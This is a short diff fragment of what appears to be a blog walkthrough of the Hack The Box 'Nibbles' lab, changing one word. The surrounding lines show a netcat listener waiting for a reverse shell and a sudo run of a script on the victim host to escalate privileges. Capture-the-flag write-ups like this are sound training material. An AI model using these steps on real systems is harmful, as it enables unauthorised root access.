rubenhortas/rubenhortas.github.io/_posts/2023-07-03-htb-nibbles-walkthrough.md

 $ nc -lvnp 1235
 ```

-And we execute the `monitor.sh` script as sudo in the target (victim) host:
+And we execute the `monitor.sh` script with sudo in the target (victim) host:

 ```
 $ sudo /home/nibbler/personal/stuff/monitor.sh